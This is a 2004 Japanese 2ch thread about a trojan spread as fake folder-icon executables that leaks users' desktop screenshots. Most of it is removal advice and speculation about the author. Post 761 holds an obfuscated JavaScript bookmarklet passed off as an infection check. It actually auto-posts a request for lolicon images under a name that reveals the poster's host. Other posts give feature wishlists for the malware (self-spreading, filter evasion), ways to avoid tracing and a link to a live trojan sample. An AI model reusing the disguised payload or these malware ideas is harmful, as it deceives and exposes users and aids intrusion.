652 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:55:00 ID:Q9B0LMRA]: 2ch側がUserAgentではじくようにするのが手っ取り早い?
653 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:57:19 ID:R1XdgUSO]: >>650
【うｐろだ】アップローダー案内所13【きんたま】
idol.bbspink.com/test/read.cgi/ascii2d/1095857518/617
654 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:58:51 ID:o5J4yEHm]: >653
わかった。どうも。
655 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:59:22 ID:cDvdfQLH]: にしてもDelphiやらPerlやら、糞言語ばかりで作るな・・・ｳｨﾙｽ
656 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:05:43 ID:sH8yfJe2]: >>635はXP Pro前提で書いてます。
Homeやその他のOSは>>604あたりで。
657 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:06:19 ID:avdWvEQz]: >>656
やっぱりpro限定だったか
658 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:06:22 ID:+1rdgFwz]: 感染するやつは馬鹿
659 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:07:11 ID:IFT2b9V5]: >>652
monadzillaのブラウザの何かに偽装してるんじゃないかと思うよ。
660 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:08:11 ID:cDvdfQLH]: 苺キンタマのUSER_AGENTはmonazilla.orgの資料室そのままでしたが。
661 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:08:22 ID:IFT2b9V5]: taskkillあたりは、買ったOSのsupportディレクトリにあるsupporttoolsにあるんじゃないかと。
662 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:10:41 ID:mmGHQUsE]: しかし久々にflashget使ったよｗ
663 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:13:14 ID:dsk7MRPS]: 一番簡単な削除方法は>>643って事？
664 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:13:41 ID:IE8I1c5s]: 俺も久々にIrvine使ったｗ
665 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:15:05 ID:Q9B0LMRA]: Monazilla/1.00 (toolname/ver)Maropa2chをはじけば
666 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:27:08 ID:Zv59j045]: しかしキンタマ関係のVirus作る奴はいつも笑わしてくれる
667 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:35:02 ID:ntwmMQhY]: 俺フォルダアイコンデフォのままなんだがこんなの踏む奴いるのか？
668 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:35:42 ID:mmGHQUsE]: もううｐはやんだの？
669 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:36:08 ID:yEjCkAsP]: .folderどころか.exeを踏む奴がイパーイ
>>667
一応変えといたら？
670 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:37:41 ID:avdWvEQz]: ってなに、shareの方でもクリップボード晒しｳｨﾙｽが出てたんだな
share初のｳｨﾙｽとは聞いていたが、ｸﾘﾎﾞ晒しとは、なかなかやるじゃないかshare
671 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:39:33 ID:62NRg8JO]: >>667 ロリ画像の欲望に負けたら踏むさ

>>668 祭り会場にいってみなされ

俺も今更ながら変えたよ　圧縮ファイルにはdelexeとSSMは手放せない　
672 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:41:38 ID:cDvdfQLH]: ってかXPユーザは気付けよ、アイコンが古い事と小さくしたらそのまんま小さくなる点に。
673 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:43:20 ID:ntwmMQhY]: >>672
同意。
アイコンが全然違う。
674 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:32:28 ID:E03v0hA1]: ｵﾜﾀ
675 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:34:21 ID:mva2OVxj]: Share(仮称)__part66
tmp4.2ch.net/test/read.cgi/download/1095530285/644
644 名前：人柱 ◆k2VpQ2TTb. ：04/09/23 02:03:52 ID:9E7gEobQ
実は秘密のプログラムには秘密のバックドアが仕掛けてあったって知ってた？
京都府警のところにいってるよん。
676 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:40:20 ID:oBodvraO]: まず作者は
・うｐ炉だを多数の中からランダムに
・ｷｬﾌﾟﾁｬ以外もうｐ。できればkakikomi.txt
・繁殖機能
これよろしく
677 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:41:48 ID:yDWoB56M]: Rock54対策も重要だな
678 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:47:20 ID:biKrCHPF]: 2chのそれっぽいスレでURL検索
対応うｐろだCGI検出
特殊なファイル名でうｐ
うｐファイル名を調べて同種ウィルスによるうｐ数が一定以上ならば
新たなうpろだ探し

複数のうｐろだCGIに対応しておけばそれなりに
強固だと思ふ
679 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:47:44 ID:mmGHQUsE]: あ～面白かった。三日分は笑ったな。
680 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:51:47 ID:XmzjVHkd]: exe ファイル　捨てたい
681 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:52:48 ID:oBodvraO]: 自身をうｐろだに名前変えまくってうｐしまくり

はやめてね
困るから
682 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:59:52 ID:EETLBaqB]: 苺キンタマに感染したかどうかは
どうやってわかるの？教えてエロい人
683 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:00:29 ID:LvJ+JBBu]: 苺ウィルスワラタｗ
なんだこりゃ
684 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:05:04 ID:LvJ+JBBu]: それにしてもよくもいろいろと考えつくものだ
685 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:05:08 ID:IFT2b9V5]: >>682
タスクマネージャひらいてプロセス見て、
なかにshellsystem.exeってのがあったらアウト。
686 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:12:36 ID:LvJ+JBBu]: >>682
つーか、exe実行したの？実行してないなら９割９分平気。
687 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:19:35 ID:EETLBaqB]: >>685
アリガトウ。感染してないみたいだ。良かった

>>686
してないと思う。
688 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:29:09 ID:xduUn+v/]: 作りこんではあるが、洗練されてない
不必要なコードがいっぱいあるけど、なんでやろ。

ttp://www.ff.iij4u.or.jp/~ch2/bbstable.html
ここからターゲット（おすすめ、チャット、特別企画、ツール類、運営案内など）を選択、

FROM=%s&mail=%s&MESSAGE=%s&bbs=%s&key=%s&time=%s&submit=%sで、メル欄に回数
subject=%s&FROM=%s&mail=%s&MESSAGE=%s&bbs=%s&time=%s&submit=%s、スレ作成機能
form-data /upload/c=03okari/confirm.cgi
up.isp.2ch.net up.isp.2ch.net/upload/c=03okari/confirm.cgi この辺で取得して書きコ
Software\Meropa ？？なんだろこのディレクトリ
Software\Microsoft\Windows\CurrentVersion\Run 投下先
Software\Microsoft\Microsotf 何か投下
フォルダアイコンはbitmapをそのまま使ってるから変なんだな

逆アセも簡単そうなので、環境持ってると............
パラメータを変えるだけで、感染能力含め、かなりいろいろなことができるように作ってある
いわば、キンタマメイカーのようなものか？
689 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:30:41 ID:yEjCkAsP]: カキコの内容少し弄るだけで又２ｃｈに投稿されるようになるしな
690 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:33:43 ID:62NRg8JO]: 将来のために余裕を持って設計してあるってことか…
691 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:35:48 ID:MBxbzncs]: まだまだ祭りは続きそうだ
692 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:39:42 ID:9fWyBJ/z]: 今日はネットをしていなかった
今更ながらウィルスの存在を知った。
さっそく調べて行って見た。
関さんが面白いと思った。
693 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:39:47 ID:qx0T+sDR]: ｷﾝﾀﾏ騒ぎがあってよかーたと重田
694 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:09:24 ID:LvJ+JBBu]: >>690
いくらでも亜種が作れるってことだろうな
695 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:12:23 ID:rtwkFYAH]: >>685
タスクマネージャのプロセスから削除だけじゃダメなの？
696 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:19:45 ID:kOQgldzO]: 当たり前だろ…
697 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:21:34 ID:rtwkFYAH]: やっぱりだめか
698 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:23:04 ID:qaAkrrtW]: 再起動したら復活するし
699 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:25:47 ID:Y5vbHsBs]: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
ここら辺もregeditで見とけよ
700 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:27:59 ID:rtwkFYAH]: shellsystem.exe以外は無視してOK？
あとノートンで遮断した場合は画像は流れない？
701 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:34:09 ID:XZhKNgqY]: なんだか調子に乗って改造した奴が先に逮捕されそう
702 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:37:36 ID:rMURrwFg]: 牛に我慢させるか
703 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:40:22 ID:EiFN9IZi]: 誤爆だ　わりぃ
704 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:44:18 ID:62NRg8JO]: これならとってもわかりやすい画像ですな

v.isp.2ch.net/up/6e671bb4b867.jpg　もう典型的かと
705 名前：[名無し]さん(bin+cue).rar [04/09/23 04:58:57 ID:MZi2DiBQ]: これｘｐ以外は平気なの？
706 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:59:21 ID:SFKAhjW3]: ノートンインターネットセキュリティの様なものが常駐してたら
プログラムによって勝手に晒されるようなことは無いよな？
707 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:00:55 ID:JtMoVLJN]: plaza.rakuten.co.jp/sakinya/
708 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:02:56 ID:g70Ywgh6]: >>705
どうしてそういう結論になるのかが判らん。

>>706
設定次第。学習モードとかでユーザが勝手な通信を許可したら､
なんぼセキュリティソフトが入っててもそりゃアウトにもなる。
709 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:04:36 ID:Q7dG25BA]: アップローダから知らないファイル落としたりしなきゃ、感染しないんだよな？
こうもいっぱいかかってると、最近何も落としてないのに不安になる
710 名前：[名無し]さん(bin+cue).rar [04/09/23 05:04:47 ID:MZi2DiBQ]: >>708
ボロPCで感染実験してみたのさ（OS　ME）
そんで晒されるか待ってるだけど、一向にうｐされないんでつよ。
711 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:05:29 ID:4TL6YJ26]: まぁ拡張子表示はしっかりしとけってこったな
712 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:09:58 ID:xduUn+v/]: >>705
苺キンタマ(仮)は、Windows 98以降なら感染というか、踏んだら効果を示す

>>706
httpを使うからWebが見られる環境ならアウト（f/wで80番閉じてれば別だが、web見られないよ）
713 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:10:25 ID:5x3EooTF]: v.isp.2ch.net/up/4250ab8226aa.jpg
貴様ッ見ているな！
714 名前：[名無し]さん(bin+cue).rar [04/09/23 05:13:40 ID:MZi2DiBQ]: windows\shellsystem.exeはあったんだけど
レジストリは追加されてないんだよね
これじゃまだ感染しとらんのかね？

もう一回踏んでみるかな。。。
715 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:14:27 ID:57yhE0eV]: PFW入れてれば、ウィルスが通信しようとしたのを検知してくれるんじゃないかい
何でもOKで通してれば意味無いけど
あと、SP2のPFWはアウトバウンド検知してくれないんだっけ？
716 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:18:37 ID:aY8YkHOS]: ttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip
トロイらしいんだけど、だれか解析頼む。
717 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:19:45 ID:xduUn+v/]: >>715
ウイルスというか、現時点ではトロイなんだが
通信といっても、書き込みと変わらんからf/wでの検知は難しい
XP SP2のf/wは、外→内のみ。
718 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:25:36 ID:JsiucGEH]: 結局はキンタマと同じでexeを実行しなければいいってことだけど
XPは標準で表示しないしな。
何でこんな仕様なんだorz

ところでアップローダスレを自分のユーザ名で検索してしまった香具師

ﾉｼ
719 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:25:48 ID:eq0QK75x]: 俺もサンプルとして捕獲しておきたいんだが、苺1の1360の三点セットってやつでいいんだよね。
720 名前：[名無し]さん(bin+cue).rar [04/09/23 05:27:02 ID:Ypzo5dny]: ってかny関係ないじゃん・・・
721 名前：[名無し]さん(bin+cue).rar [04/09/23 05:28:00 ID:0ylh05j4]: ｽﾚﾀｲでややこしくなってるね
722 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:28:17 ID:57yhE0eV]: >>717
普通のPFWってEXEファイル単位で通信を検知して知らせてくれんじゃないの？
ループバックでも利用してない限りは大丈夫だと思うが
723 名前：719 mailto:sage [04/09/23 05:29:12 ID:eq0QK75x]: ＯＫ、これであってたようだ。
724 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:29:54 ID:MqBRPt/h]: >httpを使うからWebが見られる環境ならアウト（f/wで80番閉じてれば別だが、web見られないよ）

>f/w
725 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:33:52 ID:Pi3bt/OK]: おもしろそいので俺も捕獲しとこ
726 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:34:21 ID:AH6SroMo]: さて、キンタマと違って
特定のサイトやアップローダーに書き込みを行う以上
そこから業務妨害で損害賠償請求されてもおかしくないトロイなんだが

ま、日本の警察じゃ作成者を特定できんだろうな・・・
でも、苺にexeファイルをアップした人間を特定して締め上げればいいのか？
727 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:34:22 ID:Pi3bt/OK]: 間違え;y=ｰ( ﾟдﾟ)･∵.　ﾀｰﾝ
728 名前：[名無し]さん(bin+cue).rar [04/09/23 05:50:14 ID:U98tvZkV]: 要望まとめ
・複数のうpろだをランダムに使うように(2ちゃんねるアップローダーはやめれ)
・デスクトップ画像以外もうｐするように(kakikomi.txtとか)
・繁殖機能。zipで適当なファイルといっしょにウィルス本体も固めてうｐ。
・Rock54対策。NGワードが含まれる書き込みが規制されるから晒しテンプレを複数作れば大丈夫か?
729 名前：[名無し]さん(bin+cue).rar [04/09/23 05:50:39 ID:VGKgqq6T]: なんで怪しいexeファイルを実行すんのかなって思ってたけど
拡張子を表示しない設定だと初心者はわからんわな～
730 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:52:17 ID:IFT2b9V5]: >>728
要望するなよ(笑)
731 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:52:23 ID:4TL6YJ26]: セキュリティに対する意識ってなかなかあがらないな
732 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:54:24 ID:fgnK5pHv]: >>728
共犯者ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!
733 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:56:44 ID:tcoLxpqV]: 人間のロリ好きってアニメ、ゲームも好む傾向があるんだな。
なかなか興味深かった。
734 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:58:31 ID:cTDJ+/Lv]: kakikomi晒されたら辛いな
他の情報で個人割れてたらきっと死人が出る
735 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:07:00 ID:JsiucGEH]: exeごとに通信制御するNortonとかのFWは
ポート80番使ってようとブロックするんじゃないの？
736 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:09:13 ID:IFT2b9V5]: >>735
する。というか、初物がソケットひらこうとしたときに騒ぐ。
737 名前：[名無し]さん(bin+cue).rar [04/09/23 06:10:23 ID:0ylh05j4]: で、エロの魔力で許可するをクリック！
738 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:18:26 ID:0jfdhz8j]: 簡易プロテクト？

C:\WINDOWS>copy notepad.exe shellsystem.exe
C:\WINDOWS>attrib +R shellsystem.exe

とりあえず実験用の９８ＳＥ環境ではうまくいった。
メインマシンで実験する度胸はないので、ＸＰなどでは不明。
739 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:25:02 ID:J6w/KxT0]: これ犯人たどれるだろ。ネットカフェとかかな？
740 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:26:03 ID:IFT2b9V5]: >>739
踏み台はさまってたら無理
741 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:29:08 ID:J6w/KxT0]: >>740
プロバイダに問い合わせりゃアクセス記録のこってんじゃないの？
742 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:32:12 ID:IFT2b9V5]: >>741
ドコのプロバイダに問い合わせるの？
743 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:32:29 ID:JsiucGEH]: 海外プロキシを多段でかましてればよほどのことがないと
たどれてもたどらないと思う。
744 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:35:42 ID:J6w/KxT0]: >>742
踏み台のだよ。
745 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:38:02 ID:IFT2b9V5]: >>744
もし俺が犯人だったとしたら、踏み台にしろ串にしろ
一段ではやらないだろうね。捕まりたくないし。
746 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:40:16 ID:xduUn+v/]: >>739
追求のキーになるのが >>688で報告した
> Software\Meropa ？？なんだろこのディレクトリ
なんだが、こんなディレクトリを作るアプリは、かなーり特殊な
半導体設計用のものらしい。こんなの入れてる人間は国内では限られる。
ここから手繰るのがよさげ。スキルは相当と思えるので、配布元から掘るのは難しそう
747 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:40:33 ID:J6w/KxT0]: >>745
俺がもし被害者だったら100段くらいまでは頑張ってたどるよｗ
この手のウイルスは犯人が殺されても不思議じゃないと思うんだが。
748 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:44:13 ID:xduUn+v/]: >>747
そこいらに、いくらでもある
WEP無効の無線LANを踏み台にしてたら、
多段串・海外串なんか使わなくても
たどるのは難しい。
749 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:44:40 ID:J6w/KxT0]: 殺されるは言い過ぎかｗ　でもなんらかの報復は受けると思う。
つーか踏み台に時限セットされたものなら辿るの不可能っぽいな・・
750 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:45:30 ID:zW53Q5jb]: ネカフェで時限式アップロードするように仕込んだとか。
751 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:46:34 ID:99Ier2R9]: 頑張れ。
752 名前：[名無し]さん(bin+cue).rar [04/09/23 07:02:00 ID:CBy0Cio6]: こうゆうのを見ると2chやnyする人ってヒッ●ーだけなのかなって思うね

v.isp.2ch.net/up/fa86350a6026.jpg

ウイルスに気づかずに必死に抜いている人1名ｗ
753 名前：469 mailto:sage [04/09/23 07:04:35 ID:kh8TR4yq]: これって本人達が寝てる間は安全なんだね。
754 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:08:11 ID:kh8TR4yq]: 数字消すの忘れた・・・＿|￣|○
755 名前：[名無し]さん(bin+cue).rar [04/09/23 07:08:12 ID:CBy0Cio6]: どうせなら、SS、PC名だけじゃなくて、
IP・ホストも晒してほしかったな
756 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:12:12 ID:IFT2b9V5]: >>752
これは狙ってやってる気がしないではないな(笑)
757 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:45:55 ID:CtAJ3p7u]: 俺はこんなウイルスは怖くて作れないな
何が怖いって狙われるのが怖いね
作った奴は絶対に捕まらないと思ってるんだから
本気になって追ってみたら面白いことになるかも
例えばウイルス作者が警察だったりしたらヤバイだろうし。
そうじゃなくても作った奴は確実に追われた後人生終わるだろうし
そんな一世一代の大事俺は出来ない
758 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:14:59 ID:wZ9Gu9IX]: 新種ウイルスと聞いてきました
759 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:15:35 ID:iqYKdWhe]: 面白い事考える奴もいるもんだな
760 名前：[名無し]さん(bin+cue).rar [04/09/23 08:18:41 ID:U98tvZkV]: Winnyは関係ないけどな。
今やってるのはShareで回ってるふしあなで2ch書き込みと半虹の苺ｷﾝﾀﾏ
761 名前：[名無し]さん(bin+cue).rar [04/09/23 08:25:55 ID:U98tvZkV]: 便乗してこれまで流行ってる
JavaScript:document.body.innerHTMLのｶﾞｲﾄﾞﾗｲﾝ2
that3.2ch.net/test/read.cgi/gline/1076853643/595-586

感染確認するには
2ch専用ブラウザを使用している人は、ＩＥなどの一般的なブラウザでこのスレを開いておく。
１、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b
46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414
7452e76616c75653d275c75333045445c75333045415c75373533425c75
353043465c75333034465c75333036305c75333035355c7533303434273
b7375626d69742e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+=
'%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。

２、改行を外して１行にする。
３、１行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。
４、 Enterを押す（もしくは「移動」をクリックする）。
エラーが出れば感染してます
762 名前：[名無し]さん(bin+cue).rar [04/09/23 08:26:46 ID:U98tvZkV]: >>761
参照間違えた・・
that3.2ch.net/test/read.cgi/gline/1076853643/595-596
763 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:27:19 ID:1gUyhrM3]: 　
764 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:51:04 ID:SPCjNc3y]: 俺はﾍﾟｹﾋﾟｰがはじめての初心者だが、拡張子表示は真っ先にやったぞ…。
まぁ、かつては黒羊とﾒｰﾙｽﾄｰﾑをふんだ苦い経験持ちだが。
765 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:07:42 ID:SY1J+4JW]: >>761
ﾜﾛﾀ
ロリ画像ですか
766 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:08:11 ID:GmtpX3PS]: 【使用OS】WinXP
【WindowsUpdateしてるか】はい。
【AntiVirusは】？？
【ちゃんとUpdateしてるか】？？
【スキャンした結果】オンラインにてスキャン
【オンラインスキャンしたならその結果は】いつもなら数個出るのに、不自然なぐらい何も検出されませんでした。
【Winnyのﾊﾞｰｼﾞｮﾝ】使ってません。ネットでウィルス貰いました。
【Winny歴、総DL量は】無し
【テンプレを読んだか】はい。
【テンプレにある対策を実行したか】実行しました。特に何も無かったです。
【症状か具体的に、分かる限りすべて書く】何となく、重い。動作が鈍い。
【何をしたらそんなことになったのか】うｐされてたファイルを開いたら。
【これまでにとった措置】オンラインスキャンのみ。
767 名前：[名無し]さん(bin+cue).rar [04/09/23 09:12:14 ID:U98tvZkV]: >>766
(写真集) (ロリータ) 水原友里.exe
(写真集) (ロリータ) 相田香奈子.exe
コピー～ (写真集) (ロリータ) 河瀬菜美.exe
どれか開いた?
768 名前：[名無し]さん(bin+cue).rar [04/09/23 09:19:52 ID:Jz5Ghtix]: キンタマ作った香具師、逮捕されたのか
769 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:25:30 ID:GmtpX3PS]: >>767
開いたというか、ダブルクリックして開こうとした。
どれだったか覚えてない…。多分、２回ぐらい開こうとした。
何か怪しかったし、急にPCの反応がおかしくなったから、速攻電源切りました。
その後にまた起動して、全部ゴミ箱に捨てて、ゴミ箱も空にしました。
770 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:28:46 ID:kh8TR4yq]: >>769
もう遅いｗ
とりあえず↓に来い。
削除の方法が分かるかもしれない。

アップローダーってずるい
idol.bbspink.com/test/read.cgi/ascii2d/1095880065/
771 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:28:49 ID:j/Jnnczc]: >>769
今すぐネットを切断
C:\WINDOWSフォルダの中でshellsystem.exeを消せ
再起動して後は知ってるならレジストリの自動実行の辺りを探せ
急げ
772 名前：[名無し]さん(bin+cue).rar [04/09/23 09:29:12 ID:U98tvZkV]: >>769
とりあえずユーザ名とコンピュータ名を晒せ。
マイコンピュータのプロパティから見れる。
773 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:30:19 ID:afWjuRcq]: >>766
ご愁傷様
774 名前：[名無し]さん(bin+cue).rar [04/09/23 09:30:56 ID:0ylh05j4]: >>685
を見て確認してみ
775 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:41:27 ID:P9SKfCRL]: >>762
596 名前：水先案名無い人[sage] 投稿日：04/09/21(火) 22:21:33 ID:aLtl7+rE<
>>595のやつやると名前欄fusianasan、本文ロリ画像くださいで勝手に投稿されるってわけか？

597 名前：水先案名無い人[] 投稿日：04/09/21(火) 23:16:48 ID:raTTdWET<
16進でご苦労な事だ。

598 名前：p29d3b8.urawac00.ap.so-net.ne.jp[] 投稿日：04/09/21(火) 23:18:09 ID:ItaWKNCP<
ロリ画像ください

599 名前：水先案名無い人[sage] 投稿日：04/09/21(火) 23:18:27 ID:ItaWKNCP<
orz

600 名前：水先案名無い人[sage] 投稿日：04/09/22(水) 00:18:50 ID:8s+8uxdE<
おらは投稿確認が出て助かっただ

601 名前：水先案名無い人[sage] 投稿日：04/09/22(水) 01:00:01 ID:A3RcQubp<
そいえば、たいていの掲示板ってhttpだからポストする時に
暗号化されていないデータが云々のダイアログを出せるはずだが、
それを解除してる人って結構多いみたいだね。

602 名前：zaq3d2e96f7.zaq.ne.jp[] 投稿日：04/09/22(水) 02:42:09 ID:nVW0EyTb<
ロリ画像ください

603 名前：濡れ衣 zaq3d2e96f7.zaq.ne.jp ◆SbICHIROZ6 [sage] 投稿日：04/09/22(水) 02:43:59 ID:nVW0EyTb<
570はどうなるかちゃんと書いておいてくれよ。。
リモホ晒すのは構わないけど、テストスレになっちまうぞ

604 名前：水先案名無い人[sage] 投稿日：04/09/22(水) 03:55:11 ID:7PnzxniJ<
いかん、笑いが止まらんｗ
やらんでよかったｗ
776 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:47:30 ID:tcoLxpqV]: ノートンでスキャン中の画像がよく晒されてたけど
対策ソフト入れてると安心するから簡単に引っかかるんじゃないの。
しかもこういう祭り時には無力。全くの無駄金だな。
777 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:53:59 ID:qlyssBj7]: 拡張子表示は鬱陶しいし、長いスペースとかがあるから詳細表示のファイルの種類で判断してるなぁ
778 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:55:34 ID:GmtpX3PS]: >>771
そのレジストリとやらは良く分からんが…
まあ、とりあえず初心者板で聞いてくる。
検索したらshellsystem.exeが見付かった。
とりあえず、急ぎます。ありがとう。
779 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:57:12 ID:cDvdfQLH]: >拡張子表示は鬱陶しい

ﾊｧ?
780 名前：[名無し]さん(bin+cue).rar [04/09/23 10:00:05 ID:/EYVc77v]: 明かされてる画像みても無害？
781 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:01:16 ID:xduUn+v/]: いくらノートン先生でも、登場したてのトロイにすぐには反応できませんぜ
今回の作成日時は、3本とも22日15:57 流されたのが夕方としても、まだ
10時間しかたってない。しかも踏んでるやつ大杉。

作者も、これほどの効果を期待してなかっただろーな。そうでなきゃアプロダ
が落ちるというのも考慮してると思う。この反応からして、ここ数日間に数種の
亜種が出てくると思う。トロイの改変も楽勝っぽいので、便乗犯も多そう。

一番のセキュリティホールは、ユーザーの意識だもんよ。
782 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:03:05 ID:Ze0M08FR]: ちなみにキンタマが発見されたのが3月半ば。対応は3月末。
783 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:03:32 ID:kDRZUavo]: 歴史は繰り返す。
784 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:05:29 ID:4TL6YJ26]: そして人は学ばない
785 名前：[名無し]さん(bin+cue).rar [04/09/23 10:07:05 ID:7loVoFeI]: mp3の名前などを勝手にいじるウィルスってあります？
786 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:08:25 ID:LvJ+JBBu]: >>729
アイコンでわかるだろ？
787 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:12:17 ID:kDRZUavo]: >>786
アイコンがフォルダアイコンに偽装されてるから無知が実行する。
